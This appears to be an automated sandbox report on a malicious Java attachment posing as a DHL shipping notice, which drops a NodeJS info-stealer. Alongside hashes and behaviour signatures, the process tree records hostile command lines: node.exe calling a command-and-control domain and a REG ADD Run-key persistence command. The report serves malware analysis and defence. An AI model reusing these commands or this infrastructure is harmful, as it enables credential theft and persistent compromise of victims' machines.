Analysis
-
max time kernel
58s -
max time network
128s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
16-10-2020 10:54
Static task
static1
Behavioral task
behavioral1
Sample
DHL Notification DHL_AWB_0011179303 ETD.jar
Resource
win7
Behavioral task
behavioral2
Sample
DHL Notification DHL_AWB_0011179303 ETD.jar
Resource
win10v200722
General
-
Target
DHL Notification DHL_AWB_0011179303 ETD.jar
-
Size
249KB
-
MD5
51dc82e81caca8221a80c68aabf06596
-
SHA1
0e0e7c82b36f7240d7677bf2c12d8750d22e5542
-
SHA256
c7e2b03baae34026d8993fd56a55511a7d8ec99e784aba042d5e89fd404f7d98
-
SHA512
cfd75246ad15c7260a373ff6b781e31c599064dbb40ee1c77be5a32deb2c46c80b7b52476c71c31cf205ce4c07697e11a90afe6b26c6d06d87392a1e489b7dde
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3776 node.exe 3400 node.exe 2212 node.exe -
Loads dropped DLL 6 IoCs
pid Process 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run\9d660ebe-4a21-4c24-a08e-65de984ef859 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001adc3-168.dat js behavioral2/files/0x000100000001adc3-172.dat js behavioral2/files/0x000100000001adc3-176.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3776 node.exe 3776 node.exe 3776 node.exe 3776 node.exe 3400 node.exe 3400 node.exe 3400 node.exe 3400 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe 2212 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3076 wrote to memory of 2196 3076 java.exe 74 PID 3076 wrote to memory of 2196 3076 java.exe 74 PID 2196 wrote to memory of 3776 2196 javaw.exe 78 PID 2196 wrote to memory of 3776 2196 javaw.exe 78 PID 3776 wrote to memory of 3400 3776 node.exe 80 PID 3776 wrote to memory of 3400 3776 node.exe 80 PID 3400 wrote to memory of 2212 3400 node.exe 81 PID 3400 wrote to memory of 2212 3400 node.exe 81 PID 2212 wrote to memory of 3484 2212 node.exe 83 PID 2212 wrote to memory of 3484 2212 node.exe 83 PID 3484 wrote to memory of 3640 3484 cmd.exe 84 PID 3484 wrote to memory of 3640 3484 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\DHL Notification DHL_AWB_0011179303 ETD.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6630fbc2.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3640
-
-
-
-
-
-